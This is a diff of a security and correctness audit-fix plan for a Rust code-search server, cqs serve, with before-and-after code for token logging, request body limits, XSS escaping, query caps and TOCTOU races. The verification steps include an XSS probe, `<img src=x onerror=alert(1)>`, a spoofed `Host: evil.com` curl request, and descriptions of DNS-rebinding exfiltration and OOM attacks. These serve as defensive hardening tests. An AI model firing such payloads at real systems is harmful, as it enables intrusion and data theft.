+            // banners separately from the structured log stream.
+            match auth.as_ref() {
+                Some(token) => {
+                    println!(
+                        "cqs serve listening on http://{actual}/?token={}",
+                        token.as_str()
+                    );
+                }
+                None => {
+                    println!("cqs serve listening on http://{actual}");
+                    eprintln!(
+                        "WARN: --no-auth in use — anyone with network access to {actual} \
+                         can read this index"
+                    );
+                }
+            }
+            println!("press Ctrl-C to stop");
+        }
+        tracing::info!(addr = %actual, auth_enabled = auth.is_some(), "cqs serve started");
+```
+
+### Replacement
+
+```rust
+        if !quiet {
+            // #1096: when auth is enabled, emit the paste-ready URL
+            // (token + bind addr) so a fresh launch is one click away
+            // from being usable. The token appears here once and is
+            // never logged via tracing — auditors can grep for serve
+            // banners separately from the structured log stream.
+            //
+            // SEC: route the token-bearing banner to STDERR when stdout
+            // is not a TTY. systemd `StandardOutput=journal` and container
+            // log drivers persist stdout into a 30-day retention store —
+            // stderr is similarly captured but is the conventional place
+            // for "informational interactive output" and operators can
+            // redirect it (`2>/dev/null`) without losing structured logs.
+            // For a stronger guarantee, set `--no-banner` (TODO).
+            let stdout_is_tty = std::io::IsTerminal::is_terminal(&std::io::stdout());
+            match auth.as_ref() {
+                Some(token) => {
+                    let line = format!(
+                        "cqs serve listening on http://{actual}/?token={}",
+                        token.as_str()
+                    );
+                    if stdout_is_tty {
+                        println!("{line}");
+                    } else {
+                        eprintln!("{line}");
+                        eprintln!(
+                            "(stdout is not a TTY; token-bearing banner routed to stderr to avoid \
+                             persisting into journald/container logs)"
+                        );
+                    }
+                }
+                None => {
+                    println!("cqs serve listening on http://{actual}");
+                    eprintln!(
+                        "WARN: --no-auth in use — anyone with network access to {actual} \
+                         can read this index"
+                    );
+                }
+            }
+            println!("press Ctrl-C to stop");
+        }
+        tracing::info!(addr = %actual, auth_enabled = auth.is_some(), "cqs serve started");
+```
+
+### Notes
+
+- `std::io::IsTerminal` stable since 1.70. MSRV is 1.95, fine.
+- Stretch (out of scope here): Jupyter-style `--no-banner` flag that writes the URL to a `0o600` file in `$XDG_RUNTIME_DIR` instead. Tracking-issue material.
+- Update CHANGELOG: "`cqs serve` no longer prints the auth-bearing URL to stdout when stdout is non-interactive (systemd / container) — banner routes to stderr instead. Set `--no-auth` if banner suppression is required."
+
+---
+
+## P1.14 — cqs serve has no RequestBodyLimitLayer — authenticated client can OOM via large POST
+
+**Finding:** P1.14 in audit-triage.md / Security
+**Files:** `src/serve/mod.rs:154-196` (`build_router`)
+**Why:** All routes are `GET`, but axum buffers the request body before dispatching. No `RequestBodyLimitLayer` means an authenticated client can `POST /api/stats` with `Content-Length: 99999999999` and OOM the daemon before the 405.
+
+### Current code (src/serve/mod.rs:158-196)
+
+```rust
+    let mut app = Router::new()
         .route("/health", get(handlers::health))
         .route("/api/stats", get(handlers::stats))
-        .route("/api/graph", get(handlers::graph))
-        .route("/api/chunk/{id}", get(handlers::chunk_detail))
-        .route("/api/hierarchy/{id}", get(handlers::hierarchy))
-        .route("/api/embed/2d", get(handlers::cluster_2d))
-        .route("/api/search", get(handlers::search))
-        .route("/", get(assets::index_html))
-        .route("/static/{*path}", get(assets::static_asset))
-        .with_state(state)
-        .layer(axum::middleware::from_fn_with_state(
-            allowed_hosts,
-            enforce_host_allowlist,
-        ))
-        // Gzip every response axum sends. The graph + cluster JSON
-        // payloads compress ~5-10× (1-2 MB → 150-300 KB on the cqs
-        // corpus); vendor JS bundles compress ~3×. Negligible CPU on
-        // the server side, big win on parse/transfer time at the browser.
+        // ... routes ...
+        .with_state(state);
+
+    if let Some(token) = auth {
+        app = app.layer(from_fn_with_state(token, auth::enforce_auth));
+    }
+
+    app
+        .layer(from_fn_with_state(allowed_hosts, enforce_host_allowlist))
         .layer(CompressionLayer::new())
+        .layer(TraceLayer::new_for_http())
 }
 ```
 
-Update every `build_router(state)` call in `src/serve/tests/` (and anywhere else) to pass the allowlist arg — easiest via a small test helper that wraps `build_router` with an allowlist built from a synthetic `"127.0.0.1:0".parse::<SocketAddr>().unwrap()`.
+### Replacement
 
-**Why**: Axum has no built-in Host validation; without it, a malicious DNS-rebinding page can make the victim's browser fetch `http://127.0.0.1:8080/api/search?q=...` from an attacker origin and exfiltrate the whole corpus. Allowlisting loopback + the actual bind host defangs the class without breaking local-only use.
+```rust
+    let mut app = Router::new()
+        .route("/health", get(handlers::health))
+        .route("/api/stats", get(handlers::stats))
+        // ... routes unchanged ...
+        .with_state(state);
 
-**Verify**: `cargo build --features gpu-index,serve` and `cargo test --features gpu-index,serve serve::`. Manual: `cqs serve &` then `curl -H 'Host: evil.com' http://127.0.0.1:8080/api/stats` must return 403; `curl -H 'Host: localhost:8080' http://127.0.0.1:8080/api/stats` must return 200.
+    if let Some(token) = auth {
+        app = app.layer(from_fn_with_state(token, auth::enforce_auth));
+    }
+
+    app
+        .layer(from_fn_with_state(allowed_hosts, enforce_host_allowlist))
+        // SEC: cap request bodies. Every route is GET; legitimate clients
+        // never send a body. 64 KiB is plenty for query strings and cookies
+        // (which travel in headers, not body); axum still rejects bodies
+        // larger than this with 413 Payload Too Large before allocating.
+        .layer(tower_http::limit::RequestBodyLimitLayer::new(64 * 1024))
+        .layer(CompressionLayer::new())
+        // ... TraceLayer + MakeSpan customisation per P1.11 ...
+}
+```
+
+### Notes
+
+- `tower_http::limit::RequestBodyLimitLayer` is already in the dep tree (`tower_http` is imported at the top of `serve/mod.rs`); no Cargo.toml change. Verify with `cargo tree -p tower-http -e features 2>&1 | grep limit` — if not enabled, add `"limit"` to the `tower-http` feature list in `Cargo.toml`.
+- Layer order matters: this sits *outside* auth/host-allowlist (so the limit applies even to rejected requests, preventing OOM-then-401 attacks) but *inside* compression so the 413 response is still gzipped.
 
 ---
 
-### SEC-2: XSS via unescaped error body in hierarchy-3d / cluster-3d
+## P1.15 — UMAP coords not invalidated on chunk content change — cluster view serves stale
 
-**File**: `/mnt/c/Projects/cqs/src/serve/assets/views/hierarchy-3d.js`
+**Finding:** P1.15 in audit-triage.md / Data Safety
+**Files:** `src/store/chunks/async_helpers.rs:339-362` (UPSERT)
+**Why:** v22 added `umap_x`/`umap_y` columns; `cqs index --umap` writes them. The chunk UPSERT refreshes embedding/embedding_base/etc. on content_hash mismatch but does NOT touch UMAP coords. Cluster view then displays the chunk at a position computed from the old embedding.
 
-**Current code** (lines 103-114):
-```javascript
-      try {
-        const resp = await fetch(apiUrl);
-        if (!resp.ok) {
-          const body = await resp.text();
-          this.container.innerHTML = `<div class="error" style="margin:24px">hierarchy HTTP ${resp.status}: ${body.slice(0, 200)}</div>`;
-          return null;
-        }
-        return await resp.json();
-      } catch (e) {
-        this.container.innerHTML = `<div class="error" style="margin:24px">hierarchy fetch error: ${e.message}</div>`;
-        return null;
-      }
-```
-
-Plus the earlier `init` error paths in the same file at lines 57-64 (the `3D bundle failed to load: ${e.message}` interpolation is the same class).
-
-**Fix**: Add a local `escapeHtml` helper near the top of the IIFE (after `"use strict";` on line 15, before the `TYPE_COLORS` const), because the one in `app.js` is scoped inside a separate IIFE and not reachable:
-
-```javascript
-  function escapeHtml(s) {
-    return String(s)
-      .replace(/&/g, "&amp;")
-      .replace(/</g, "&lt;")
-      .replace(/>/g, "&gt;")
-      .replace(/"/g, "&quot;")
-      .replace(/'/g, "&#039;");
-  }
-```
-
-Then wrap every server-derived interpolation inside an `innerHTML` template literal:
-- Line 64 (`3D bundle failed to load`): `${e.message}` → `${escapeHtml(e.message)}`
-- Line 107 (hierarchy HTTP error): `${body.slice(0, 200)}` → `${escapeHtml(body.slice(0, 200))}`
-- Line 112 (hierarchy fetch error): `${e.message}` → `${escapeHtml(e.message)}`
-
-Leave pure number interpolations (`${resp.status}`) alone.
-
-**File**: `/mnt/c/Projects/cqs/src/serve/assets/views/cluster-3d.js`
-
-**Current code** (lines 84-128):
-```javascript
-      if (typeof window.cqsEnsureThreeBundle === "function") {
-        try {
-          await window.cqsEnsureThreeBundle();
-        } catch (e) {
-          container.innerHTML = `<div class="error" style="margin:24px">3D bundle failed to load: ${e.message}</div>`;
-          throw e;
-        }
-      }
-
-      container.innerHTML = "";
-      if (typeof ForceGraph3D === "undefined") {
-        container.innerHTML =
-          '<div class="error" style="margin:24px">3D renderer not loaded — check that ' +
-          "<code>/static/vendor/three.min.js</code> and " +
-          "<code>/static/vendor/3d-force-graph.min.js</code> served correctly.</div>";
-        throw new Error("ForceGraph3D global not present");
-      }
-    },
-
-    /// Router calls this before render() because cluster has its own data
-    /// source (UMAP coords, not the call-graph payload).
-    async loadData(context) {
-      const url = context.url;
-      const maxNodes = context.maxNodes || 1500;
-      const params = new URLSearchParams({ max_nodes: String(maxNodes) });
-      this.colorMode = url.searchParams.get("color") === "language" ? "language" : "type";
-
-      try {
-        const resp = await fetch(`/api/embed/2d?${params}`);
-        if (!resp.ok) {
-          const body = await resp.text();
-          this.container.innerHTML = `<div class="error" style="margin:24px">cluster HTTP ${resp.status}: ${body.slice(0, 200)}</div>`;
-          return null;
-        }
-        const data = await resp.json();
-        if (data.nodes.length === 0) {
-          this.container.innerHTML =
-            `<div class="error" style="margin:24px">No UMAP coordinates in this index ` +
-            `(${data.skipped.toLocaleString()} chunks have no projection). ` +
-            `Run <code>cqs index --umap</code> from the project root, then refresh.</div>`;
-          return null;
-        }
-        return data;
-      } catch (e) {
-        this.container.innerHTML = `<div class="error" style="margin:24px">cluster fetch error: ${e.message}</div>`;
-        return null;
-      }
-    },
-```
-
-**Fix**: Same as above — add the `escapeHtml` helper at the top of the IIFE (after `"use strict";` on line 17). Then wrap:
-- Line 87: `${e.message}` → `${escapeHtml(e.message)}`
-- Line 114: `${body.slice(0, 200)}` → `${escapeHtml(body.slice(0, 200))}`
-- Line 127: `${e.message}` → `${escapeHtml(e.message)}`
-
-`data.skipped.toLocaleString()` is safe (u64 serialized by server, formatter only emits digits/separators) — leave as-is.
-
-**Why**: `body.slice(0, 200)` and `e.message` can reflect attacker-controlled strings (e.g. a chunk-id embedded in a shared URL that echoes into the error path, or browser-shaped URL fragments). Pasting into `innerHTML` unescaped allows script injection into the same origin as `/api/*`, which gives full corpus read. Standard five-char escape closes the class.
-
-**Verify**: `cargo build --features gpu-index,serve`. Manually: `cqs serve`, visit a URL like `/#view=hierarchy-3d&root=<img src=x onerror=alert(1)>` — expect literal text, no `alert`.
-
----
-
-### SEC-3: `build_graph` / `build_cluster` unbounded SQL fetches (DoS)
-
-**File**: `/mnt/c/Projects/cqs/src/serve/data.rs`
-
-**Current code** — three places:
-
-Uncapped node SELECT, lines 219-237:
-```rust
-        let (node_sql, want_n_callers_col) = if max_nodes.is_some() {
-            (
-                "SELECT c.id, c.name, c.chunk_type, c.language, c.origin, \
-                        c.line_start, c.line_end, \
-                        COALESCE((SELECT COUNT(*) FROM function_calls fc \
-                                  WHERE fc.callee_name = c.name), 0) AS n_callers_global \
-                 FROM chunks c \
-                 WHERE 1=1"
-                    .to_string(),
-                true,
-            )
-        } else {
-            (
-                "SELECT id, name, chunk_type, language, origin, line_start, line_end \
-                 FROM chunks WHERE 1=1"
-                    .to_string(),
-                false,
-            )
-        };
-```
-
-Uncapped edge SELECT, lines 318-350 (the `else` arm of `let edge_rows = if max_nodes.is_some() { ... } else { ... }`):
-```rust
-        let edge_rows = if max_nodes.is_some() {
-            let mut name_set: std::collections::HashSet<&str> = std::collections::HashSet::new();
-            for node in nodes_by_id.values() {
-                name_set.insert(node.name.as_str());
-            }
-            if name_set.is_empty() {
-                Vec::new()
-            } else {
-                let names: Vec<&str> = name_set.into_iter().collect();
-                let placeholders = vec!["?"; names.len()].join(",");
-                let edge_sql = format!(
-                    "SELECT fc.file, fc.caller_name, fc.callee_name \
-                     FROM function_calls fc \
-                     WHERE fc.callee_name IN ({placeholders}) \
-                        OR fc.caller_name IN ({placeholders})"
-                );
-                let mut eq = sqlx::query(&edge_sql);
-                for n in &names {
-                    eq = eq.bind(*n);
-                }
-                for n in &names {
-                    eq = eq.bind(*n);
-                }
-                eq.fetch_all(&store.pool).await?
-            }
-        } else {
-            sqlx::query(
-                "SELECT fc.file, fc.caller_name, fc.callee_name \
-                 FROM function_calls fc",
-            )
-            .fetch_all(&store.pool)
-            .await?
-        };
-```
-
-Uncapped cluster SELECT, lines 831-861:
-```rust
-    store.rt.block_on(async {
-        // Chunks that have coords already projected.
-        let rows = sqlx::query(
-            "SELECT id, name, chunk_type, language, origin, line_start, line_end, umap_x, umap_y \
-             FROM chunks WHERE umap_x IS NOT NULL AND umap_y IS NOT NULL ORDER BY id",
-        )
-        .fetch_all(&store.pool)
-        .await?;
-
-        let skipped_row: (i64,) =
-            sqlx::query_as("SELECT COUNT(*) FROM chunks WHERE umap_x IS NULL OR umap_y IS NULL")
-                .fetch_one(&store.pool)
-                .await?;
-        let skipped = skipped_row.0.max(0) as u64;
-
-        // Per-chunk caller/callee counts. Same name-based join as
-        // build_graph; counts only edges whose endpoints both resolve
-        // inside the projected set so the n_callers/n_callees on a node
-        // accurately describe what the cluster view shows.
-        let mut caller_count: HashMap<String, u32> = HashMap::new();
-        let mut callee_count: HashMap<String, u32> = HashMap::new();
-        let mut name_to_first_id: HashMap<String, String> = HashMap::new();
-        for row in &rows {
-            let id: String = row.get("id");
-            let name: String = row.get("name");
-            name_to_first_id.entry(name).or_insert(id);
-        }
-
-        let edge_rows = sqlx::query("SELECT caller_name, callee_name FROM function_calls")
-            .fetch_all(&store.pool)
-            .await?;
-```
-
-**Fix**: Add module-level hard caps near the top of `data.rs` (with the existing imports):
+### Current code (src/store/chunks/async_helpers.rs:339-362)
 
 ```rust
-/// SEC-3: absolute ceiling on nodes returned by `/api/graph` even when the
-/// client doesn't pass `?max_nodes=N`. Prevents a single unauth request from
-/// materialising the full chunks table (millions of rows) in process memory.
-const ABS_MAX_GRAPH_NODES: usize = 50_000;
-
-/// SEC-3: absolute ceiling on edges returned by `/api/graph`. function_calls
-/// typically has ~10× the rows of chunks, so cap higher but still bound.
-const ABS_MAX_GRAPH_EDGES: usize = 500_000;
-
-/// SEC-3: absolute ceiling on nodes returned by `/api/embed/2d`.
-const ABS_MAX_CLUSTER_NODES: usize = 50_000;
-```
-
-Replace the node SELECT block (current lines 219-237) with a single always-capped path:
-
-```rust
-        // SEC-3: always bind an effective cap. When the client omits
-        // `?max_nodes`, fall back to ABS_MAX_GRAPH_NODES so a single
-        // request can't materialise a million chunks into memory.
-        let effective_cap = max_nodes
-            .unwrap_or(ABS_MAX_GRAPH_NODES)
-            .min(ABS_MAX_GRAPH_NODES);
-        let (node_sql, want_n_callers_col) = (
-            "SELECT c.id, c.name, c.chunk_type, c.language, c.origin, \
-                    c.line_start, c.line_end, \
-                    COALESCE((SELECT COUNT(*) FROM function_calls fc \
-                              WHERE fc.callee_name = c.name), 0) AS n_callers_global \
-             FROM chunks c \
-             WHERE 1=1"
-                .to_string(),
-            true,
+        qb.push(
+            " ON CONFLICT(id) DO UPDATE SET \
+             origin=excluded.origin, \
+             source_type=excluded.source_type, \
+             language=excluded.language, \
+             chunk_type=excluded.chunk_type, \
+             name=excluded.name, \
+             signature=excluded.signature, \
+             content=excluded.content, \
+             content_hash=excluded.content_hash, \
+             doc=excluded.doc, \
+             line_start=excluded.line_start, \
+             line_end=excluded.line_end, \
+             embedding=excluded.embedding, \
+             embedding_base=excluded.embedding_base, \
+             source_mtime=excluded.source_mtime, \
+             updated_at=excluded.updated_at, \
+             parent_id=excluded.parent_id, \
+             window_idx=excluded.window_idx, \
+             parent_type_name=excluded.parent_type_name, \
+             parser_version=excluded.parser_version \
+             WHERE chunks.content_hash != excluded.content_hash \
+                OR chunks.parser_version != excluded.parser_version",
         );
 ```
 
-Then the existing `if let Some(cap) = max_nodes { ... } else { ... }` around lines 257-265 becomes unconditional:
+### Replacement
+
+Add `umap_x = NULL, umap_y = NULL` so the cluster view's `IS NOT NULL` filter correctly reports "needs reprojection". The CASE clause restricts the NULL-out to the content-changed branch — pure parser_version bumps don't invalidate UMAP because the embedding hasn't changed.
 
 ```rust
-        // Stable tie-break by id so equal-rank chunks don't reshuffle
-        // between requests.
-        node_query.push_str(" ORDER BY n_callers_global DESC, c.id ASC LIMIT ?");
-        binds.push(effective_cap.to_string());
+        qb.push(
+            " ON CONFLICT(id) DO UPDATE SET \
+             origin=excluded.origin, \
+             source_type=excluded.source_type, \
+             language=excluded.language, \
+             chunk_type=excluded.chunk_type, \
+             name=excluded.name, \
+             signature=excluded.signature, \
+             content=excluded.content, \
+             content_hash=excluded.content_hash, \
+             doc=excluded.doc, \
+             line_start=excluded.line_start, \
+             line_end=excluded.line_end, \
+             embedding=excluded.embedding, \
+             embedding_base=excluded.embedding_base, \
+             source_mtime=excluded.source_mtime, \
+             updated_at=excluded.updated_at, \
+             parent_id=excluded.parent_id, \
+             window_idx=excluded.window_idx, \
+             parent_type_name=excluded.parent_type_name, \
+             parser_version=excluded.parser_version, \
+             umap_x=CASE WHEN chunks.content_hash != excluded.content_hash \
+                         THEN NULL ELSE chunks.umap_x END, \
+             umap_y=CASE WHEN chunks.content_hash != excluded.content_hash \
+                         THEN NULL ELSE chunks.umap_y END \
+             WHERE chunks.content_hash != excluded.content_hash \
+                OR chunks.parser_version != excluded.parser_version",
+        );
 ```
 
-Replace the entire edge-fetch block (lines 318-350) with the always-scoped version:
+### Notes
 
-```rust
-        // SEC-3: always use the name-scoped edge fetch, even when the
-        // client didn't pass `max_nodes`. The previous uncapped
-        // `SELECT fc.*` would return the entire function_calls table
-        // (tens of millions of rows on a large monorepo). An extra LIMIT
-        // provides a hard ceiling in case the IN-list grows unexpectedly.
-        let edge_rows = {
-            let mut name_set: std::collections::HashSet<&str> = std::collections::HashSet::new();
-            for node in nodes_by_id.values() {
-                name_set.insert(node.name.as_str());
-            }
-            if name_set.is_empty() {
-                Vec::new()
-            } else {
-                let names: Vec<&str> = name_set.into_iter().collect();
-                let placeholders = vec!["?"; names.len()].join(",");
-                let edge_sql = format!(
-                    "SELECT fc.file, fc.caller_name, fc.callee_name \
-                     FROM function_calls fc \
-                     WHERE fc.callee_name IN ({placeholders}) \
-                        OR fc.caller_name IN ({placeholders}) \
-                     LIMIT ?"
-                );
-                let mut eq = sqlx::query(&edge_sql);
-                for n in &names {
-                    eq = eq.bind(*n);
-                }
-                for n in &names {
-                    eq = eq.bind(*n);
-                }
-                eq = eq.bind(ABS_MAX_GRAPH_EDGES as i64);
-                eq.fetch_all(&store.pool).await?
-            }
-        };
-```
-
-In `build_cluster`, replace the initial row fetch (lines 833-838) with:
-
-```rust
-        // SEC-3: cap the initial fetch so an unauth request can't
-        // materialise the full chunks table. When the client passes a
-        // smaller `max_nodes`, the post-fetch truncate (line 909 range)
-        // still applies — this limit is a server-side safety net.
-        let effective_cap = max_nodes
-            .unwrap_or(ABS_MAX_CLUSTER_NODES)
-            .min(ABS_MAX_CLUSTER_NODES);
-        let rows = sqlx::query(
-            "SELECT id, name, chunk_type, language, origin, line_start, line_end, umap_x, umap_y \
-             FROM chunks \
-             WHERE umap_x IS NOT NULL AND umap_y IS NOT NULL \
-             ORDER BY id \
-             LIMIT ?",
-        )
-        .bind(effective_cap as i64)
-        .fetch_all(&store.pool)
-        .await?;
-```
-
-And cap the cluster edge fetch (line 859-861):
-
-```rust
-        let edge_rows = sqlx::query(
-            "SELECT caller_name, callee_name FROM function_calls LIMIT ?",
-        )
-        .bind(ABS_MAX_GRAPH_EDGES as i64)
-        .fetch_all(&store.pool)
-        .await?;
-```
-
-**Why**: Today each request to `/api/graph` or `/api/embed/2d` materialises every `chunks` row (on cqs itself that's ~400 MB of Rust `String`s per request); on a large monorepo it's unbounded. The UI's happy path already passes `max_nodes=1500`, so the hard ceiling only kicks in for misuse / tooling.
-
-**Verify**: `cargo build --features gpu-index,serve` and `cargo test --features gpu-index,serve serve::`. Manual: `curl 'http://127.0.0.1:8080/api/graph'` must return `<= 50_000` nodes regardless of corpus size.
+- Add a regression test in `src/store/chunks/` (or wherever upsert tests live) that:
+  1. Inserts a chunk with `umap_x=Some(1.0), umap_y=Some(2.0)` (write via `update_umap_coords_batch`).
+  2. UPSERTs the same chunk with new content (different `content_hash`).
+  3. Asserts `umap_x IS NULL AND umap_y IS NULL`.
+- Stretch (out of scope): metadata `umap_generation` counter to surface "needs reprojection" warnings in `cqs serve`. Tracking-issue material.
 
 ---
 
-### PB-V1.29-2: Watch SPLADE encoder silent no-op on Windows
+## P1.16 — --name-boost CLI: defensive clamp at consumer (CLI parser already fixed)
 
-**File**: `/mnt/c/Projects/cqs/src/cli/watch.rs`
+**Finding:** P1.16 in audit-triage.md / Algorithm
+**Files:** `src/cli/args.rs:62` (already uses `parse_unit_f32`), `src/search/scoring/candidate.rs:283-289`
+**Why:** **LINE DRIFT:** the audit text claims CLI uses `parse_finite_f32`. Verified at `src/cli/args.rs:62`: `value_parser = parse_unit_f32` (clap-bounded `[0.0, 1.0]` per `src/cli/definitions.rs:137-143`). CLI side is already fixed. The remaining defense-in-depth concern: the consumer in `apply_scoring_pipeline` does not clamp, so if `name_boost` ever flows from a path that bypasses `parse_unit_f32` (programmatic library usage, future config-file path that skips `clamp_config_f32`, deserialization), the multiplication still sign-flips.
 
-**Current code** (lines 1082-1099):
-```rust
-    let mut batch: Vec<(String, String)> = Vec::new();
-    for file in changed_files {
-        let origin = file.display().to_string();
-        let chunks = match store.get_chunks_by_origin(&origin) {
-            Ok(v) => v,
-            Err(e) => {
-                tracing::warn!(
-                    origin = %origin,
-                    error = %e,
-                    "SPLADE encode: failed to fetch chunks for file — skipping"
-                );
-                continue;
-            }
-        };
-        for chunk in chunks {
-            batch.push((chunk.id, chunk.content));
-        }
-    }
-```
-
-**Fix**: Use `cqs::normalize_path` so the origin uses forward slashes — matching the form stored at ingest.
+### Current code (src/search/scoring/candidate.rs:277-289)
 
 ```rust
-    let mut batch: Vec<(String, String)> = Vec::new();
-    for file in changed_files {
-        // PB-V1.29-2: `file.display()` emits Windows backslashes, which
-        // never match the forward-slash origins stored at ingest (chunks
-        // are upserted via `normalize_path`). Using `.display()` here
-        // makes SPLADE encoding a silent no-op on Windows.
-        let origin = cqs::normalize_path(file);
-        let chunks = match store.get_chunks_by_origin(&origin) {
-            Ok(v) => v,
-            Err(e) => {
-                tracing::warn!(
-                    origin = %origin,
-                    error = %e,
-                    "SPLADE encode: failed to fetch chunks for file — skipping"
-                );
-                continue;
-            }
-        };
-        for chunk in chunks {
-            batch.push((chunk.id, chunk.content));
-        }
-    }
-```
-
-**Why**: `chunks.origin` is persisted through `normalize_path` which forward-slashes every separator (see `src/lib.rs:348`). Looking up with `file.display()` on Windows produces `src\foo.rs`, which never matches `src/foo.rs` in the table. Net effect: SPLADE sparse vectors silently diverge from dense ones on Windows until the next full `cqs index`.
-
-**Verify**: `cargo build --features gpu-index` and `cargo test --features gpu-index watch::`. Linux-only repos see no observable change; Windows/WSL Windows-path runs now re-encode SPLADE after an edit.
-
----
-
-### DS2-1: `prune_missing` reads origin list outside write tx (TOCTOU)
-
-**File**: `/mnt/c/Projects/cqs/src/store/chunks/staleness.rs`
-
-**Current code** (lines 69-104, showing the open of the function through the `begin_write` call):
-```rust
-    pub fn prune_missing(
-        &self,
-        existing_files: &HashSet<PathBuf>,
-        root: &Path,
-    ) -> Result<u32, StoreError> {
-        let _span = tracing::info_span!("prune_missing", existing = existing_files.len()).entered();
-        self.rt.block_on(async {
-            let rows: Vec<(String,)> = sqlx::query_as(
-                "SELECT DISTINCT origin FROM chunks WHERE source_type = 'file'",
-            )
-            .fetch_all(&self.pool)
-            .await?;
-
-            // AC / CQ-V1.25-4 / CQ-V1.25-6 / PB-V1.25-7: reconcile stored origins
-            // against current filesystem state via `origin_exists`. The previous
-            // `ends_with` heuristic retained 81% of chunks as orphans whenever a
-            // worktree or subdirectory tail-matched a root file name.
-            let missing: Vec<String> = rows
-                .into_iter()
-                .filter(|(origin,)| !origin_exists(origin, existing_files, root))
-                .map(|(origin,)| origin)
-                .collect();
-
-            if missing.is_empty() {
-                return Ok(0);
-            }
-
-            // Batch delete in chunks of 100 (SQLite has ~999 param limit).
-            // Single transaction wraps ALL batches — partial prune on crash
-            // would leave the index inconsistent with disk.
-            const BATCH_SIZE: usize = 100;
-            let mut deleted = 0u32;
-
-            let (_guard, mut tx) = self.begin_write().await?;
-```
-
-**Fix**: Start the write transaction BEFORE reading origins, and run the SELECT against `&mut *tx` so the read and delete are serialisable as one unit.
-
-```rust
-    pub fn prune_missing(
-        &self,
-        existing_files: &HashSet<PathBuf>,
-        root: &Path,
-    ) -> Result<u32, StoreError> {
-        let _span = tracing::info_span!("prune_missing", existing = existing_files.len()).entered();
-        self.rt.block_on(async {
-            // DS2-1: acquire the write transaction BEFORE reading origins.
-            // Reading outside the tx creates a TOCTOU window where a
-            // concurrent upsert adds a chunk for an "existing" file; our
-            // stale origin list would then mark it missing and wipe the
-            // just-added row on DELETE.
-            let (_guard, mut tx) = self.begin_write().await?;
-
-            let rows: Vec<(String,)> = sqlx::query_as(
-                "SELECT DISTINCT origin FROM chunks WHERE source_type = 'file'",
-            )
-            .fetch_all(&mut *tx)
-            .await?;
-
-            // AC / CQ-V1.25-4 / CQ-V1.25-6 / PB-V1.25-7: reconcile stored origins
-            // against current filesystem state via `origin_exists`. The previous
-            // `ends_with` heuristic retained 81% of chunks as orphans whenever a
-            // worktree or subdirectory tail-matched a root file name.
-            let missing: Vec<String> = rows
-                .into_iter()
-                .filter(|(origin,)| !origin_exists(origin, existing_files, root))
-                .map(|(origin,)| origin)
-                .collect();
-
-            if missing.is_empty() {
-                return Ok(0);
-            }
-
-            // Batch delete in chunks of 100 (SQLite has ~999 param limit).
-            // Single transaction wraps ALL batches — partial prune on crash
-            // would leave the index inconsistent with disk.
-            const BATCH_SIZE: usize = 100;
-            let mut deleted = 0u32;
-```
-
-Then DELETE the duplicate `let (_guard, mut tx) = self.begin_write().await?;` that currently sits on line 102 — the transaction is now established at the top of the block.
-
-**Why**: The existing shape reads origins from the connection pool then opens a write tx. Between those two steps, a concurrent writer (watcher upsert, `cqs index`) can add chunks for paths that are now in `existing_files`; those chunks won't appear in the stale origin list yet are committed. Our delete then targets origins based on a snapshot from before the upsert — harmless in that case, but the inverse race (a delete inside the tx removes rows the read didn't yet see) is also possible for other row states. Putting the read under the write lock forces a consistent view. Same fix class as P2 #32 that hardened `prune_all`.
-
-**Verify**: `cargo build --features gpu-index` and `cargo test --features gpu-index prune_missing` plus `cargo test --features gpu-index store::chunks::staleness::`.
-
----
-
-### DS2-2: `prune_gitignored` reads origin list outside write tx (same TOCTOU class)
-
-**File**: `/mnt/c/Projects/cqs/src/store/chunks/staleness.rs`
-
-**Current code** (lines 323-374):
-```rust
-    pub fn prune_gitignored(
-        &self,
-        matcher: &ignore::gitignore::Gitignore,
-        root: &Path,
-        max_paths: Option<usize>,
-    ) -> Result<u32, StoreError> {
-        let _span = tracing::info_span!("prune_gitignored", max_paths = ?max_paths).entered();
-        self.rt.block_on(async {
-            // Phase 1: collect distinct origins (Rust-side filter, outside tx
-            // so the matcher walk doesn't hold the write lock).
-            let rows: Vec<(String,)> = sqlx::query_as(
-                "SELECT DISTINCT origin FROM chunks WHERE source_type = 'file'",
-            )
-            .fetch_all(&self.pool)
-            .await?;
-
-            let cap = max_paths.unwrap_or(usize::MAX);
-            let mut ignored: Vec<String> = Vec::new();
-            for (origin,) in rows.into_iter() {
-                if ignored.len() >= cap {
-                    break;
-                }
-                let origin_path = PathBuf::from(&origin);
-                let absolute = if origin_path.is_absolute() {
-                    origin_path
-                } else {
-                    root.join(&origin_path)
-                };
-                // `matched_path_or_any_parents` walks up the path's parents
-                // so that `.claude/worktrees/agent-x/src/lib.rs` is treated
-                // as ignored when `.claude/` is in `.gitignore`. The
-                // leaf-only `matched()` would miss this case — same logic
-                // as `collect_events` in `cli/watch.rs`.
-                if matcher
-                    .matched_path_or_any_parents(&absolute, false)
-                    .is_ignore()
-                {
-                    ignored.push(origin);
-                }
-            }
-
-            if ignored.is_empty() {
-                return Ok(0);
-            }
-
-            // Phase 2: batched delete in a single transaction. Same shape as
-            // `prune_missing` so a partial prune on crash leaves the index
-            // consistent with the remaining rows in `chunks`.
-            const BATCH_SIZE: usize = 100;
-            let mut deleted = 0u32;
-
-            let (_guard, mut tx) = self.begin_write().await?;
-```
-
-**Fix**: Open the write tx first, then run the SELECT under it. The matcher walk is pure CPU over an already-materialised Vec — safe to hold the lock across it.
-
-```rust
-    pub fn prune_gitignored(
-        &self,
-        matcher: &ignore::gitignore::Gitignore,
-        root: &Path,
-        max_paths: Option<usize>,
-    ) -> Result<u32, StoreError> {
-        let _span = tracing::info_span!("prune_gitignored", max_paths = ?max_paths).entered();
-        self.rt.block_on(async {
-            // DS2-2: acquire the write transaction BEFORE reading origins.
-            // Same TOCTOU fix as DS2-1: a concurrent upsert can land
-            // between the SELECT and the DELETE, and our stale origin list
-            // would then wipe the just-added row. The matcher walk below
-            // is pure CPU over the already-fetched `rows` Vec and is safe
-            // under the lock (no additional DB calls).
-            let (_guard, mut tx) = self.begin_write().await?;
-
-            let rows: Vec<(String,)> = sqlx::query_as(
-                "SELECT DISTINCT origin FROM chunks WHERE source_type = 'file'",
-            )
-            .fetch_all(&mut *tx)
-            .await?;
-
-            let cap = max_paths.unwrap_or(usize::MAX);
-            let mut ignored: Vec<String> = Vec::new();
-            for (origin,) in rows.into_iter() {
-                if ignored.len() >= cap {
-                    break;
-                }
-                let origin_path = PathBuf::from(&origin);
-                let absolute = if origin_path.is_absolute() {
-                    origin_path
-                } else {
-                    root.join(&origin_path)
-                };
-                // `matched_path_or_any_parents` walks up the path's parents
-                // so that `.claude/worktrees/agent-x/src/lib.rs` is treated
-                // as ignored when `.claude/` is in `.gitignore`. The
